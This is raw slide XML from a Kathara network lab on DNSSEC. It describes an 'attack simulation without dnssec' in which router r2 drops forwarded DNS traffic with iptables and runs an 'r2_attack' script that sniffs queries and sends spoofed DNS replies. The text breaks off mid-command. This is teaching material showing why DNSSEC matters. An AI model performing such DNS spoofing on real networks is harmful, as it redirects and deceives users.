                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D52C1193-E72F-9504-F8A2-1C3CD7C9A60A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>attack simulation without </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dnssec</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="Subtitle 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B79B61F1-69C6-17E6-D70C-CE98BA054C96}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="subTitle" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Segnaposto data 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1DE988C7-FBA8-4B23-C0F3-629EF72A48D3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>last update: Feb 2026</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Segnaposto piè di pagina 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{221BC5C9-C96E-CE3A-D66F-92ACEB573690}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>kathara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – [ lab: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dnssec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="33596679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A91365-2AF0-DEEA-79BA-583B0F9477A1}"/>
            </a:ext>
          </a:extLst>
        </p:cNvPr>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16386" name="Titolo 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1C943E1C-3798-226C-1A55-68340F192C0F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>iptables command</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16387" name="Segnaposto contenuto 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CDF56DDE-AFB5-07E4-9935-8A43A9C785FF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>on r2</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>block incoming DNS traffic in r2 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>look at eth and loopback interfaces</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Segnaposto data 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2AD3957D-B697-ED59-A343-0C5F6088D99C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>last update: Feb 2026</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Segnaposto piè di pagina 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{88FFA8AA-42E3-31C1-4D6D-71406B759C0C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>kathara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – [ lab: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dnssec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="7" name="Group 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9749C6E7-5A79-105F-475F-B8410B482A29}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2217485" y="3133725"/>
            <a:ext cx="7757030" cy="2697167"/>
            <a:chOff x="4014773" y="2378845"/>
            <a:chExt cx="7565509" cy="2825300"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="8" name="Rectangle 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{031B4DFD-61CA-6FC7-7BCC-168053C71D4D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4014776" y="2632080"/>
              <a:ext cx="7565506" cy="2572065"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:sysClr val="windowText" lastClr="000000"/>
            </a:solidFill>
            <a:ln w="57150" cap="flat" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:srgbClr val="4472C4"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:miter lim="800000"/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw blurRad="50800" dist="38100" dir="2700000" algn="tl" rotWithShape="0">
                <a:prstClr val="black">
                  <a:alpha val="40000"/>
                </a:prstClr>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr rtlCol="0" anchor="t"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:r>
                <a:rPr lang="en-US" sz="1400" noProof="0" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:lumMod val="60000"/>
                      <a:lumOff val="40000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>root@r2:/# </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="1" noProof="0" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>ip</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>tables –A FORWARD –d 110.0.0.10 –p </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>udp</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> --</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>dport</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> 53 –j DROP</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" sz="1400" b="1" noProof="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="9" name="Rectangle 5">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{23DABBE8-04CF-F0D2-3DB8-D43C996B8829}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4014773" y="2378845"/>
              <a:ext cx="7565506" cy="286249"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:srgbClr val="4472C4"/>
            </a:solidFill>
            <a:ln w="57150" cap="flat" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:srgbClr val="4472C4"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:miter lim="800000"/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw blurRad="50800" dist="25400" algn="l" rotWithShape="0">
                <a:prstClr val="black">
                  <a:alpha val="32000"/>
                </a:prstClr>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr rtlCol="0" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
                <a:defRPr/>
              </a:pPr>
              <a:r>
                <a:rPr lang="en-US" kern="0" dirty="0">
                  <a:solidFill>
                    <a:prstClr val="white"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                </a:rPr>
                <a:t>r2</a:t>
              </a:r>
              <a:endParaRPr lang="en-US" kern="0" noProof="0" dirty="0">
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:latin typeface="Calibri" panose="020F0502020204030204"/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="10" name="Group 14">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C4EB488-A839-2412-EDAE-B6C20354386D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="10920536" y="2466851"/>
              <a:ext cx="581348" cy="126235"/>
              <a:chOff x="8092857" y="2115830"/>
              <a:chExt cx="581348" cy="126235"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="11" name="Rectangle 15">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{544A6D40-A0C2-CDD6-39F8-BE7582AD57C1}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks noChangeAspect="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="8548205" y="2116065"/>
                <a:ext cx="126000" cy="126000"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:srgbClr val="FF0000">
                  <a:alpha val="50196"/>
                </a:srgbClr>
              </a:solidFill>
              <a:ln w="12700" cap="flat" cmpd="sng" algn="ctr">
                <a:solidFill>
                  <a:srgbClr val="4472C4">
                    <a:shade val="50000"/>
                  </a:srgbClr>
                </a:solidFill>
                <a:prstDash val="solid"/>
                <a:miter lim="800000"/>
              </a:ln>
              <a:effectLst/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr rtlCol="0" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:pPr algn="ctr" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US" kern="0" noProof="0" dirty="0">
                  <a:solidFill>
                    <a:prstClr val="white"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="12" name="Rectangle 16">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BCC8C251-B49A-B515-B106-4878249D9B6D}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks noChangeAspect="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="8092857" y="2115830"/>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algn="r" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US" kern="0" noProof="0" dirty="0">
                  <a:solidFill>
                    <a:prstClr val="white"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="13" name="Rectangle 17">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BC2E63D0-3300-4E15-0C7F-9843770C4072}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr>
                <a:spLocks noChangeAspect="1"/>
              </p:cNvSpPr>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="8320531" y="2115830"/>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algn="r" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                  <a:spcBef>
                    <a:spcPts val="0"/>
                  </a:spcBef>
                  <a:spcAft>
                    <a:spcPts val="0"/>
                  </a:spcAft>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US" kern="0" noProof="0" dirty="0">
                  <a:solidFill>
                    <a:prstClr val="white"/>
                  </a:solidFill>
                  <a:latin typeface="Calibri" panose="020F0502020204030204"/>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="40325459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olo 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EF3F927F-1A40-BC91-E39F-FEBC03E021B1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>run Python script</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16387" name="Segnaposto contenuto 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{73037276-E4A1-104B-93D3-4087E25E85BE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" noProof="0" dirty="0"/>
              <a:t>on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>r2</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>run the r2_attack script to sniff the traffic and then send the packet with the fake IP address to the client who made the query.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" noProof="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Segnaposto data 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8B5151A3-786F-879B-2E77-686FD1857F40}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="dt" sz="half" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>last update: Feb 2026</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Segnaposto piè di pagina 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B230EF6A-E371-9131-42E1-4EA313E8BFF4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ftr" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>kathara</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> – [ lab: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>dnssec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> ]</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="15" name="Group 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{38F7B1B9-A325-C3E5-5BC0-6FEA7781803D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1832189" y="3464424"/>
            <a:ext cx="8527621" cy="2683937"/>
            <a:chOff x="4868024" y="2378845"/>
            <a:chExt cx="6736490" cy="2064838"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="Rectangle 4">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8375F2A9-AC72-8B87-6BF7-981C001347D2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4868025" y="2659116"/>
              <a:ext cx="6736489" cy="1784567"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:solidFill>
              <a:sysClr val="windowText" lastClr="000000"/>
            </a:solidFill>
            <a:ln w="57150" cap="flat" cmpd="sng" algn="ctr">
              <a:solidFill>
                <a:srgbClr val="4472C4"/>
              </a:solidFill>
              <a:prstDash val="solid"/>
              <a:miter lim="800000"/>
            </a:ln>
            <a:effectLst>
              <a:outerShdw blurRad="50800" dist="38100" dir="2700000" algn="tl" rotWithShape="0">
                <a:prstClr val="black">
                  <a:alpha val="40000"/>
                </a:prstClr>
              </a:outerShdw>
            </a:effectLst>
          </p:spPr>
          <p:txBody>
            <a:bodyPr rtlCol="0" anchor="t"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr eaLnBrk="1" hangingPunct="1"/>
              <a:r>
                <a:rPr lang="en-US" sz="1400" noProof="0" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:lumMod val="60000"/>
                      <a:lumOff val="40000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>root@</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:lumMod val="60000"/>
                      <a:lumOff val="40000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>r2</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" noProof="0" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg2">
                      <a:lumMod val="60000"/>
                      <a:lumOff val="40000"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>:/# </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>iptables –A FORWARD –d 110.0.0.10 –p </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="1" dirty="0" err="1">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="Lucida Console" panose="020B0609040504020204" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>udp</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
